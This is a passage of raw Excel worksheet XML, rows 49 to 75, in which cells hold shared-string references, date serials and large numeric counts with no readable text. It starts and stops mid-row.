      <c r="J49" t="s">
        <v>301</v>
      </c>
      <c r="K49" t="s">
        <v>26</v>
      </c>
      <c r="L49" t="s">
        <v>77</v>
      </c>
      <c r="M49" t="s">
        <v>475</v>
      </c>
      <c r="N49" t="s">
        <v>476</v>
      </c>
      <c r="P49" t="s">
        <v>802</v>
      </c>
      <c r="Q49" t="s">
        <v>3646</v>
      </c>
      <c r="R49">
        <v>18810</v>
      </c>
      <c r="S49">
        <v>19842</v>
      </c>
      <c r="T49">
        <v>404249</v>
      </c>
      <c r="U49">
        <v>597621</v>
      </c>
      <c r="V49">
        <v>676318</v>
      </c>
      <c r="W49" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="50" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A50" t="s">
        <v>3</v>
      </c>
      <c r="B50">
        <v>43571.429527280095</v>
      </c>
      <c r="C50" t="s">
        <v>2081</v>
      </c>
      <c r="D50">
        <v>133</v>
      </c>
      <c r="E50" t="s">
        <v>2082</v>
      </c>
      <c r="F50">
        <v>103</v>
      </c>
      <c r="G50" t="s">
        <v>2083</v>
      </c>
      <c r="H50" t="s">
        <v>2084</v>
      </c>
      <c r="I50" t="s">
        <v>185</v>
      </c>
      <c r="J50" t="s">
        <v>186</v>
      </c>
      <c r="K50" t="s">
        <v>22</v>
      </c>
      <c r="L50" t="s">
        <v>77</v>
      </c>
      <c r="M50" t="s">
        <v>1831</v>
      </c>
      <c r="Q50" t="s">
        <v>3647</v>
      </c>
      <c r="T50">
        <v>2622</v>
      </c>
      <c r="U50">
        <v>4318</v>
      </c>
      <c r="V50">
        <v>10034</v>
      </c>
      <c r="W50" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="51" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A51" t="s">
        <v>3</v>
      </c>
      <c r="B51">
        <v>43663.590451458331</v>
      </c>
      <c r="C51" t="s">
        <v>2081</v>
      </c>
      <c r="D51">
        <v>133</v>
      </c>
      <c r="E51" t="s">
        <v>2086</v>
      </c>
      <c r="F51">
        <v>104</v>
      </c>
      <c r="G51" t="s">
        <v>2087</v>
      </c>
      <c r="H51" t="s">
        <v>2088</v>
      </c>
      <c r="I51" t="s">
        <v>185</v>
      </c>
      <c r="J51" t="s">
        <v>186</v>
      </c>
      <c r="K51" t="s">
        <v>22</v>
      </c>
      <c r="L51" t="s">
        <v>77</v>
      </c>
      <c r="M51" t="s">
        <v>1831</v>
      </c>
      <c r="Q51" t="s">
        <v>3647</v>
      </c>
      <c r="R51">
        <v>6606</v>
      </c>
      <c r="S51">
        <v>7026</v>
      </c>
      <c r="T51">
        <v>190904</v>
      </c>
      <c r="U51">
        <v>220353</v>
      </c>
      <c r="V51">
        <v>175531</v>
      </c>
      <c r="W51" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="52" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A52" t="s">
        <v>3</v>
      </c>
      <c r="B52">
        <v>43641.685261724539</v>
      </c>
      <c r="C52" t="s">
        <v>2081</v>
      </c>
      <c r="D52">
        <v>133</v>
      </c>
      <c r="E52" t="s">
        <v>2089</v>
      </c>
      <c r="F52">
        <v>100</v>
      </c>
      <c r="G52" t="s">
        <v>2090</v>
      </c>
      <c r="H52" t="s">
        <v>2091</v>
      </c>
      <c r="I52" t="s">
        <v>185</v>
      </c>
      <c r="J52" t="s">
        <v>186</v>
      </c>
      <c r="K52" t="s">
        <v>22</v>
      </c>
      <c r="L52" t="s">
        <v>77</v>
      </c>
      <c r="M52" t="s">
        <v>1831</v>
      </c>
      <c r="Q52" t="s">
        <v>3647</v>
      </c>
      <c r="U52">
        <v>3</v>
      </c>
      <c r="V52">
        <v>6344</v>
      </c>
      <c r="W52" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="53" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A53" t="s">
        <v>3</v>
      </c>
      <c r="B53">
        <v>43571.42952730324</v>
      </c>
      <c r="C53" t="s">
        <v>2081</v>
      </c>
      <c r="D53">
        <v>133</v>
      </c>
      <c r="E53" t="s">
        <v>2092</v>
      </c>
      <c r="F53">
        <v>103</v>
      </c>
      <c r="G53" t="s">
        <v>2093</v>
      </c>
      <c r="H53" t="s">
        <v>2094</v>
      </c>
      <c r="I53" t="s">
        <v>185</v>
      </c>
      <c r="J53" t="s">
        <v>186</v>
      </c>
      <c r="K53" t="s">
        <v>22</v>
      </c>
      <c r="L53" t="s">
        <v>77</v>
      </c>
      <c r="M53" t="s">
        <v>1831</v>
      </c>
      <c r="Q53" t="s">
        <v>3647</v>
      </c>
      <c r="R53">
        <v>201067</v>
      </c>
      <c r="S53">
        <v>196888</v>
      </c>
      <c r="T53">
        <v>3711424</v>
      </c>
      <c r="U53">
        <v>5769894</v>
      </c>
      <c r="V53">
        <v>7026761</v>
      </c>
      <c r="W53" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="54" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A54" t="s">
        <v>3</v>
      </c>
      <c r="B54">
        <v>43641.685261736115</v>
      </c>
      <c r="C54" t="s">
        <v>2081</v>
      </c>
      <c r="D54">
        <v>133</v>
      </c>
      <c r="E54" t="s">
        <v>2095</v>
      </c>
      <c r="F54">
        <v>100</v>
      </c>
      <c r="G54" t="s">
        <v>2096</v>
      </c>
      <c r="H54" t="s">
        <v>2097</v>
      </c>
      <c r="I54" t="s">
        <v>185</v>
      </c>
      <c r="J54" t="s">
        <v>186</v>
      </c>
      <c r="K54" t="s">
        <v>22</v>
      </c>
      <c r="L54" t="s">
        <v>77</v>
      </c>
      <c r="M54" t="s">
        <v>1831</v>
      </c>
      <c r="Q54" t="s">
        <v>3647</v>
      </c>
      <c r="T54">
        <v>2621</v>
      </c>
      <c r="U54">
        <v>4316</v>
      </c>
      <c r="V54">
        <v>4464</v>
      </c>
      <c r="W54" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="55" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A55" t="s">
        <v>3</v>
      </c>
      <c r="B55">
        <v>43571.429527349537</v>
      </c>
      <c r="C55" t="s">
        <v>2081</v>
      </c>
      <c r="D55">
        <v>133</v>
      </c>
      <c r="E55" t="s">
        <v>2098</v>
      </c>
      <c r="F55">
        <v>103</v>
      </c>
      <c r="G55" t="s">
        <v>2099</v>
      </c>
      <c r="H55" t="s">
        <v>2100</v>
      </c>
      <c r="I55" t="s">
        <v>185</v>
      </c>
      <c r="J55" t="s">
        <v>186</v>
      </c>
      <c r="K55" t="s">
        <v>22</v>
      </c>
      <c r="L55" t="s">
        <v>77</v>
      </c>
      <c r="M55" t="s">
        <v>1831</v>
      </c>
      <c r="Q55" t="s">
        <v>3647</v>
      </c>
      <c r="R55">
        <v>187473</v>
      </c>
      <c r="S55">
        <v>189931</v>
      </c>
      <c r="T55">
        <v>6174955</v>
      </c>
      <c r="U55">
        <v>7567660</v>
      </c>
      <c r="V55">
        <v>9331304</v>
      </c>
      <c r="W55" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="56" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A56" t="s">
        <v>3</v>
      </c>
      <c r="B56">
        <v>43663.590451469907</v>
      </c>
      <c r="C56" t="s">
        <v>2081</v>
      </c>
      <c r="D56">
        <v>133</v>
      </c>
      <c r="E56" t="s">
        <v>2101</v>
      </c>
      <c r="F56">
        <v>103</v>
      </c>
      <c r="G56" t="s">
        <v>2102</v>
      </c>
      <c r="H56" t="s">
        <v>2103</v>
      </c>
      <c r="I56" t="s">
        <v>185</v>
      </c>
      <c r="J56" t="s">
        <v>186</v>
      </c>
      <c r="K56" t="s">
        <v>22</v>
      </c>
      <c r="L56" t="s">
        <v>77</v>
      </c>
      <c r="M56" t="s">
        <v>1831</v>
      </c>
      <c r="Q56" t="s">
        <v>3647</v>
      </c>
      <c r="R56">
        <v>784</v>
      </c>
      <c r="S56">
        <v>769</v>
      </c>
      <c r="T56">
        <v>18118</v>
      </c>
      <c r="U56">
        <v>26509</v>
      </c>
      <c r="V56">
        <v>33871</v>
      </c>
      <c r="W56" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="57" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A57" t="s">
        <v>3</v>
      </c>
      <c r="B57">
        <v>43664.501604895835</v>
      </c>
      <c r="C57" t="s">
        <v>2081</v>
      </c>
      <c r="D57">
        <v>133</v>
      </c>
      <c r="E57" t="s">
        <v>2104</v>
      </c>
      <c r="F57">
        <v>102</v>
      </c>
      <c r="G57" t="s">
        <v>2105</v>
      </c>
      <c r="H57" t="s">
        <v>2106</v>
      </c>
      <c r="I57" t="s">
        <v>185</v>
      </c>
      <c r="J57" t="s">
        <v>186</v>
      </c>
      <c r="K57" t="s">
        <v>22</v>
      </c>
      <c r="L57" t="s">
        <v>77</v>
      </c>
      <c r="M57" t="s">
        <v>1831</v>
      </c>
      <c r="Q57" t="s">
        <v>3647</v>
      </c>
      <c r="R57">
        <v>10589</v>
      </c>
      <c r="S57">
        <v>11588</v>
      </c>
      <c r="T57">
        <v>320031</v>
      </c>
      <c r="U57">
        <v>571540</v>
      </c>
      <c r="V57">
        <v>547180</v>
      </c>
      <c r="W57" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="58" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A58" t="s">
        <v>3</v>
      </c>
      <c r="B58">
        <v>44291.773793194443</v>
      </c>
      <c r="C58" t="s">
        <v>2107</v>
      </c>
      <c r="D58">
        <v>130</v>
      </c>
      <c r="E58" t="s">
        <v>2108</v>
      </c>
      <c r="F58">
        <v>112</v>
      </c>
      <c r="G58" t="s">
        <v>2109</v>
      </c>
      <c r="H58" t="s">
        <v>2110</v>
      </c>
      <c r="I58" t="s">
        <v>38</v>
      </c>
      <c r="J58" t="s">
        <v>38</v>
      </c>
      <c r="K58" t="s">
        <v>38</v>
      </c>
      <c r="L58" t="s">
        <v>38</v>
      </c>
      <c r="M58" t="s">
        <v>38</v>
      </c>
      <c r="N58" t="s">
        <v>38</v>
      </c>
      <c r="Q58" t="s">
        <v>3648</v>
      </c>
      <c r="R58">
        <v>196</v>
      </c>
      <c r="S58">
        <v>230</v>
      </c>
      <c r="T58">
        <v>4394</v>
      </c>
      <c r="U58">
        <v>8177</v>
      </c>
      <c r="V58">
        <v>14475</v>
      </c>
      <c r="W58" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="59" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A59" t="s">
        <v>3</v>
      </c>
      <c r="B59">
        <v>44291.773793182867</v>
      </c>
      <c r="C59" t="s">
        <v>2107</v>
      </c>
      <c r="D59">
        <v>130</v>
      </c>
      <c r="E59" t="s">
        <v>2112</v>
      </c>
      <c r="F59">
        <v>113</v>
      </c>
      <c r="G59" t="s">
        <v>2113</v>
      </c>
      <c r="H59" t="s">
        <v>2114</v>
      </c>
      <c r="I59" t="s">
        <v>156</v>
      </c>
      <c r="J59" t="s">
        <v>301</v>
      </c>
      <c r="K59" t="s">
        <v>26</v>
      </c>
      <c r="L59" t="s">
        <v>77</v>
      </c>
      <c r="M59" t="s">
        <v>475</v>
      </c>
      <c r="N59" t="s">
        <v>476</v>
      </c>
      <c r="Q59" t="s">
        <v>3648</v>
      </c>
      <c r="R59">
        <v>1625</v>
      </c>
      <c r="S59">
        <v>1640</v>
      </c>
      <c r="T59">
        <v>23994</v>
      </c>
      <c r="U59">
        <v>44735</v>
      </c>
      <c r="V59">
        <v>57316</v>
      </c>
      <c r="W59" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="60" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A60" t="s">
        <v>3</v>
      </c>
      <c r="B60">
        <v>44405.875200196759</v>
      </c>
      <c r="C60" t="s">
        <v>2107</v>
      </c>
      <c r="D60">
        <v>130</v>
      </c>
      <c r="E60" t="s">
        <v>2115</v>
      </c>
      <c r="F60">
        <v>130</v>
      </c>
      <c r="G60" t="s">
        <v>2116</v>
      </c>
      <c r="H60" t="s">
        <v>2117</v>
      </c>
      <c r="I60" t="s">
        <v>156</v>
      </c>
      <c r="J60" t="s">
        <v>301</v>
      </c>
      <c r="K60" t="s">
        <v>26</v>
      </c>
      <c r="L60" t="s">
        <v>77</v>
      </c>
      <c r="M60" t="s">
        <v>475</v>
      </c>
      <c r="N60" t="s">
        <v>476</v>
      </c>
      <c r="Q60" t="s">
        <v>3648</v>
      </c>
      <c r="R60">
        <v>8417</v>
      </c>
      <c r="S60">
        <v>8389</v>
      </c>
      <c r="T60">
        <v>131128</v>
      </c>
      <c r="U60">
        <v>244548</v>
      </c>
      <c r="V60">
        <v>292486</v>
      </c>
      <c r="W60" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="61" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A61" t="s">
        <v>3</v>
      </c>
      <c r="B61">
        <v>43838.924898101854</v>
      </c>
      <c r="C61" t="s">
        <v>2118</v>
      </c>
      <c r="D61">
        <v>311</v>
      </c>
      <c r="E61" t="s">
        <v>2119</v>
      </c>
      <c r="F61">
        <v>101</v>
      </c>
      <c r="G61" t="s">
        <v>2120</v>
      </c>
      <c r="H61" t="s">
        <v>2121</v>
      </c>
      <c r="I61" t="s">
        <v>611</v>
      </c>
      <c r="J61" t="s">
        <v>612</v>
      </c>
      <c r="K61" t="s">
        <v>14</v>
      </c>
      <c r="L61" t="s">
        <v>77</v>
      </c>
      <c r="M61" t="s">
        <v>612</v>
      </c>
      <c r="N61" t="s">
        <v>613</v>
      </c>
      <c r="O61" t="s">
        <v>2122</v>
      </c>
      <c r="P61" t="s">
        <v>612</v>
      </c>
      <c r="Q61" t="s">
        <v>3649</v>
      </c>
      <c r="R61">
        <v>5196</v>
      </c>
      <c r="S61">
        <v>9501</v>
      </c>
      <c r="T61">
        <v>376079</v>
      </c>
      <c r="U61">
        <v>759234</v>
      </c>
      <c r="V61">
        <v>741750</v>
      </c>
      <c r="W61" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="62" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A62" t="s">
        <v>3</v>
      </c>
      <c r="B62">
        <v>43728.726477164353</v>
      </c>
      <c r="C62" t="s">
        <v>2118</v>
      </c>
      <c r="D62">
        <v>311</v>
      </c>
      <c r="E62" t="s">
        <v>2124</v>
      </c>
      <c r="F62">
        <v>100</v>
      </c>
      <c r="G62" t="s">
        <v>2125</v>
      </c>
      <c r="H62" t="s">
        <v>1074</v>
      </c>
      <c r="I62" t="s">
        <v>103</v>
      </c>
      <c r="J62" t="s">
        <v>147</v>
      </c>
      <c r="K62" t="s">
        <v>35</v>
      </c>
      <c r="L62" t="s">
        <v>83</v>
      </c>
      <c r="M62" t="s">
        <v>148</v>
      </c>
      <c r="N62" t="s">
        <v>149</v>
      </c>
      <c r="O62" t="s">
        <v>1229</v>
      </c>
      <c r="P62" t="s">
        <v>812</v>
      </c>
      <c r="Q62" t="s">
        <v>3649</v>
      </c>
      <c r="R62">
        <v>2684</v>
      </c>
      <c r="S62">
        <v>2669</v>
      </c>
      <c r="T62">
        <v>44177</v>
      </c>
      <c r="U62">
        <v>71061</v>
      </c>
      <c r="V62">
        <v>80816</v>
      </c>
      <c r="W62" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="63" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A63" t="s">
        <v>3</v>
      </c>
      <c r="B63">
        <v>43644.622735775461</v>
      </c>
      <c r="C63" t="s">
        <v>2126</v>
      </c>
      <c r="D63">
        <v>118</v>
      </c>
      <c r="E63" t="s">
        <v>2127</v>
      </c>
      <c r="F63">
        <v>103</v>
      </c>
      <c r="G63" t="s">
        <v>2128</v>
      </c>
      <c r="H63" t="s">
        <v>2129</v>
      </c>
      <c r="I63" t="s">
        <v>185</v>
      </c>
      <c r="J63" t="s">
        <v>186</v>
      </c>
      <c r="K63" t="s">
        <v>22</v>
      </c>
      <c r="L63" t="s">
        <v>77</v>
      </c>
      <c r="M63" t="s">
        <v>1831</v>
      </c>
      <c r="Q63" t="s">
        <v>3647</v>
      </c>
      <c r="R63">
        <v>403</v>
      </c>
      <c r="S63">
        <v>359</v>
      </c>
      <c r="T63">
        <v>9090</v>
      </c>
      <c r="U63">
        <v>14490</v>
      </c>
      <c r="V63">
        <v>21238</v>
      </c>
      <c r="W63" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="64" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A64" t="s">
        <v>3</v>
      </c>
      <c r="B64">
        <v>43663.666035624999</v>
      </c>
      <c r="C64" t="s">
        <v>2126</v>
      </c>
      <c r="D64">
        <v>118</v>
      </c>
      <c r="E64" t="s">
        <v>2130</v>
      </c>
      <c r="F64">
        <v>104</v>
      </c>
      <c r="G64" t="s">
        <v>2131</v>
      </c>
      <c r="H64" t="s">
        <v>2132</v>
      </c>
      <c r="I64" t="s">
        <v>185</v>
      </c>
      <c r="J64" t="s">
        <v>186</v>
      </c>
      <c r="K64" t="s">
        <v>22</v>
      </c>
      <c r="L64" t="s">
        <v>77</v>
      </c>
      <c r="M64" t="s">
        <v>1831</v>
      </c>
      <c r="Q64" t="s">
        <v>3647</v>
      </c>
      <c r="R64">
        <v>931</v>
      </c>
      <c r="S64">
        <v>801</v>
      </c>
      <c r="T64">
        <v>5837</v>
      </c>
      <c r="U64">
        <v>9057</v>
      </c>
      <c r="V64">
        <v>9398</v>
      </c>
      <c r="W64" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="65" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A65" t="s">
        <v>3</v>
      </c>
      <c r="B65">
        <v>43644.622735752317</v>
      </c>
      <c r="C65" t="s">
        <v>2126</v>
      </c>
      <c r="D65">
        <v>118</v>
      </c>
      <c r="E65" t="s">
        <v>2133</v>
      </c>
      <c r="F65">
        <v>103</v>
      </c>
      <c r="G65" t="s">
        <v>2134</v>
      </c>
      <c r="H65" t="s">
        <v>2135</v>
      </c>
      <c r="I65" t="s">
        <v>185</v>
      </c>
      <c r="J65" t="s">
        <v>186</v>
      </c>
      <c r="K65" t="s">
        <v>22</v>
      </c>
      <c r="L65" t="s">
        <v>77</v>
      </c>
      <c r="M65" t="s">
        <v>1831</v>
      </c>
      <c r="Q65" t="s">
        <v>3647</v>
      </c>
      <c r="R65">
        <v>14335</v>
      </c>
      <c r="S65">
        <v>15679</v>
      </c>
      <c r="T65">
        <v>381637</v>
      </c>
      <c r="U65">
        <v>567324</v>
      </c>
      <c r="V65">
        <v>537299</v>
      </c>
      <c r="W65" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="66" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A66" t="s">
        <v>3</v>
      </c>
      <c r="B66">
        <v>43644.622735763885</v>
      </c>
      <c r="C66" t="s">
        <v>2126</v>
      </c>
      <c r="D66">
        <v>118</v>
      </c>
      <c r="E66" t="s">
        <v>2136</v>
      </c>
      <c r="F66">
        <v>103</v>
      </c>
      <c r="G66" t="s">
        <v>2137</v>
      </c>
      <c r="H66" t="s">
        <v>2138</v>
      </c>
      <c r="I66" t="s">
        <v>185</v>
      </c>
      <c r="J66" t="s">
        <v>186</v>
      </c>
      <c r="K66" t="s">
        <v>22</v>
      </c>
      <c r="L66" t="s">
        <v>77</v>
      </c>
      <c r="M66" t="s">
        <v>1831</v>
      </c>
      <c r="Q66" t="s">
        <v>3647</v>
      </c>
      <c r="R66">
        <v>7611</v>
      </c>
      <c r="S66">
        <v>7403</v>
      </c>
      <c r="T66">
        <v>164662</v>
      </c>
      <c r="U66">
        <v>204313</v>
      </c>
      <c r="V66">
        <v>226194</v>
      </c>
      <c r="W66" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="67" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A67" t="s">
        <v>3</v>
      </c>
      <c r="B67">
        <v>43644.682801006944</v>
      </c>
      <c r="C67" t="s">
        <v>2126</v>
      </c>
      <c r="D67">
        <v>118</v>
      </c>
      <c r="E67" t="s">
        <v>2139</v>
      </c>
      <c r="F67">
        <v>105</v>
      </c>
      <c r="G67" t="s">
        <v>2140</v>
      </c>
      <c r="H67" t="s">
        <v>2141</v>
      </c>
      <c r="I67" t="s">
        <v>185</v>
      </c>
      <c r="J67" t="s">
        <v>186</v>
      </c>
      <c r="K67" t="s">
        <v>22</v>
      </c>
      <c r="L67" t="s">
        <v>77</v>
      </c>
      <c r="M67" t="s">
        <v>1831</v>
      </c>
      <c r="Q67" t="s">
        <v>3647</v>
      </c>
      <c r="R67">
        <v>52041</v>
      </c>
      <c r="S67">
        <v>50097</v>
      </c>
      <c r="T67">
        <v>993268</v>
      </c>
      <c r="U67">
        <v>1465063</v>
      </c>
      <c r="V67">
        <v>1467430</v>
      </c>
      <c r="W67" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="68" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A68" t="s">
        <v>3</v>
      </c>
      <c r="B68">
        <v>44078.847690104165</v>
      </c>
      <c r="C68" t="s">
        <v>2142</v>
      </c>
      <c r="D68">
        <v>111</v>
      </c>
      <c r="E68" t="s">
        <v>2143</v>
      </c>
      <c r="F68">
        <v>111</v>
      </c>
      <c r="G68" t="s">
        <v>1669</v>
      </c>
      <c r="H68" t="s">
        <v>2144</v>
      </c>
      <c r="I68" t="s">
        <v>31</v>
      </c>
      <c r="J68" t="s">
        <v>262</v>
      </c>
      <c r="K68" t="s">
        <v>31</v>
      </c>
      <c r="L68" t="s">
        <v>77</v>
      </c>
      <c r="M68" t="s">
        <v>262</v>
      </c>
      <c r="N68" t="s">
        <v>263</v>
      </c>
      <c r="Q68" t="s">
        <v>3650</v>
      </c>
      <c r="R68">
        <v>40529</v>
      </c>
      <c r="S68">
        <v>48944</v>
      </c>
      <c r="T68">
        <v>526150</v>
      </c>
      <c r="U68">
        <v>973026</v>
      </c>
      <c r="V68">
        <v>1507346</v>
      </c>
      <c r="W68" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="69" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A69" t="s">
        <v>3</v>
      </c>
      <c r="B69">
        <v>43776.697613124998</v>
      </c>
      <c r="C69" t="s">
        <v>2147</v>
      </c>
      <c r="D69">
        <v>103</v>
      </c>
      <c r="E69" t="s">
        <v>2148</v>
      </c>
      <c r="F69">
        <v>103</v>
      </c>
      <c r="G69" t="s">
        <v>2149</v>
      </c>
      <c r="H69" t="s">
        <v>2150</v>
      </c>
      <c r="I69" t="s">
        <v>156</v>
      </c>
      <c r="J69" t="s">
        <v>301</v>
      </c>
      <c r="K69" t="s">
        <v>26</v>
      </c>
      <c r="L69" t="s">
        <v>77</v>
      </c>
      <c r="M69" t="s">
        <v>475</v>
      </c>
      <c r="N69" t="s">
        <v>476</v>
      </c>
      <c r="Q69" t="s">
        <v>3651</v>
      </c>
      <c r="R69">
        <v>47672</v>
      </c>
      <c r="S69">
        <v>45731</v>
      </c>
      <c r="T69">
        <v>841878</v>
      </c>
      <c r="U69">
        <v>1568125</v>
      </c>
      <c r="V69">
        <v>1628618</v>
      </c>
      <c r="W69" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="70" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A70" t="s">
        <v>3</v>
      </c>
      <c r="B70">
        <v>43791.179654837964</v>
      </c>
      <c r="C70" t="s">
        <v>2152</v>
      </c>
      <c r="D70">
        <v>110</v>
      </c>
      <c r="E70" t="s">
        <v>2153</v>
      </c>
      <c r="F70">
        <v>110</v>
      </c>
      <c r="G70" t="s">
        <v>2154</v>
      </c>
      <c r="H70" t="s">
        <v>2155</v>
      </c>
      <c r="I70" t="s">
        <v>156</v>
      </c>
      <c r="J70" t="s">
        <v>301</v>
      </c>
      <c r="K70" t="s">
        <v>26</v>
      </c>
      <c r="L70" t="s">
        <v>77</v>
      </c>
      <c r="M70" t="s">
        <v>475</v>
      </c>
      <c r="N70" t="s">
        <v>476</v>
      </c>
      <c r="Q70" t="s">
        <v>3648</v>
      </c>
      <c r="R70">
        <v>8154</v>
      </c>
      <c r="S70">
        <v>7637</v>
      </c>
      <c r="T70">
        <v>122095</v>
      </c>
      <c r="U70">
        <v>203064</v>
      </c>
      <c r="V70">
        <v>226212</v>
      </c>
      <c r="W70" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="71" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A71" t="s">
        <v>3</v>
      </c>
      <c r="B71">
        <v>43893.137950798613</v>
      </c>
      <c r="C71" t="s">
        <v>2156</v>
      </c>
      <c r="D71">
        <v>111</v>
      </c>
      <c r="E71" t="s">
        <v>2157</v>
      </c>
      <c r="F71">
        <v>111</v>
      </c>
      <c r="G71" t="s">
        <v>2158</v>
      </c>
      <c r="H71" t="s">
        <v>2159</v>
      </c>
      <c r="I71" t="s">
        <v>156</v>
      </c>
      <c r="J71" t="s">
        <v>301</v>
      </c>
      <c r="K71" t="s">
        <v>26</v>
      </c>
      <c r="L71" t="s">
        <v>77</v>
      </c>
      <c r="M71" t="s">
        <v>475</v>
      </c>
      <c r="N71" t="s">
        <v>476</v>
      </c>
      <c r="Q71" t="s">
        <v>3648</v>
      </c>
      <c r="R71">
        <v>2901</v>
      </c>
      <c r="S71">
        <v>2813</v>
      </c>
      <c r="T71">
        <v>45338</v>
      </c>
      <c r="U71">
        <v>82349</v>
      </c>
      <c r="V71">
        <v>100872</v>
      </c>
      <c r="W71" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="72" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A72" t="s">
        <v>3</v>
      </c>
      <c r="B72">
        <v>43663.644034953701</v>
      </c>
      <c r="C72" t="s">
        <v>2160</v>
      </c>
      <c r="D72">
        <v>103</v>
      </c>
      <c r="E72" t="s">
        <v>2161</v>
      </c>
      <c r="F72">
        <v>102</v>
      </c>
      <c r="G72" t="s">
        <v>2162</v>
      </c>
      <c r="H72" t="s">
        <v>2163</v>
      </c>
      <c r="I72" t="s">
        <v>185</v>
      </c>
      <c r="J72" t="s">
        <v>186</v>
      </c>
      <c r="K72" t="s">
        <v>22</v>
      </c>
      <c r="L72" t="s">
        <v>77</v>
      </c>
      <c r="M72" t="s">
        <v>1831</v>
      </c>
      <c r="Q72" t="s">
        <v>3647</v>
      </c>
      <c r="R72">
        <v>761</v>
      </c>
      <c r="S72">
        <v>833</v>
      </c>
      <c r="T72">
        <v>9286</v>
      </c>
      <c r="U72">
        <v>30141</v>
      </c>
      <c r="V72">
        <v>52382</v>
      </c>
      <c r="W72" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="73" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A73" t="s">
        <v>3</v>
      </c>
      <c r="B73">
        <v>43644.598832650459</v>
      </c>
      <c r="C73" t="s">
        <v>2160</v>
      </c>
      <c r="D73">
        <v>103</v>
      </c>
      <c r="E73" t="s">
        <v>2164</v>
      </c>
      <c r="F73">
        <v>100</v>
      </c>
      <c r="G73" t="s">
        <v>2165</v>
      </c>
      <c r="H73" t="s">
        <v>2166</v>
      </c>
      <c r="I73" t="s">
        <v>185</v>
      </c>
      <c r="J73" t="s">
        <v>186</v>
      </c>
      <c r="K73" t="s">
        <v>22</v>
      </c>
      <c r="L73" t="s">
        <v>77</v>
      </c>
      <c r="M73" t="s">
        <v>1831</v>
      </c>
      <c r="Q73" t="s">
        <v>3647</v>
      </c>
      <c r="R73">
        <v>204</v>
      </c>
      <c r="S73">
        <v>295</v>
      </c>
      <c r="T73">
        <v>4016</v>
      </c>
      <c r="U73">
        <v>6321</v>
      </c>
      <c r="V73">
        <v>11652</v>
      </c>
      <c r="W73" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="74" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A74" t="s">
        <v>3</v>
      </c>
      <c r="B74">
        <v>43644.598832673611</v>
      </c>
      <c r="C74" t="s">
        <v>2160</v>
      </c>
      <c r="D74">
        <v>103</v>
      </c>
      <c r="E74" t="s">
        <v>2167</v>
      </c>
      <c r="F74">
        <v>100</v>
      </c>
      <c r="G74" t="s">
        <v>44</v>
      </c>
      <c r="H74" t="s">
        <v>2168</v>
      </c>
      <c r="I74" t="s">
        <v>185</v>
      </c>
      <c r="J74" t="s">
        <v>186</v>
      </c>
      <c r="K74" t="s">
        <v>22</v>
      </c>
      <c r="L74" t="s">
        <v>77</v>
      </c>
      <c r="M74" t="s">
        <v>1831</v>
      </c>
      <c r="Q74" t="s">
        <v>3647</v>
      </c>
      <c r="R74">
        <v>810083</v>
      </c>
      <c r="S74">
        <v>841425</v>
      </c>
      <c r="T74">
        <v>22365500</v>
      </c>
      <c r="U74">
        <v>29405581</v>
      </c>
      <c r="V74">
        <v>35310545</v>
      </c>
      <c r="W74" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="75" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A75" t="s">
        <v>3</v>
      </c>
      <c r="B75">
        <v>43721.705608020835</v>
      </c>
      <c r="C75" t="s">
        <v>2169</v>
      </c>
      <c r="D75">
        <v>105</v>
      </c>
      <c r="E75" t="s">
        <v>2170</v>
      </c>
      <c r="F75">
        <v>103</v>
      </c>
      <c r="G75" t="s">
        <v>2171</v>
      </c>
      <c r="H75" t="s">
        <v>1074</v>
      </c>
      <c r="I75" t="s">
        <v>38</v>
      </c>
      <c r="J75" t="s">
        <v>38</v>
      </c>
      <c r="K75" t="s">
        <v>38</v>
      </c>
      <c r="L75" t="s">
        <v>38</v>
      </c>
      <c r="M75" t="s">
        <v>38</v>
      </c>
      <c r="N75" t="s">
        <v>38</v>
      </c>
      <c r="O75" t="s">
        <v>1661</v>
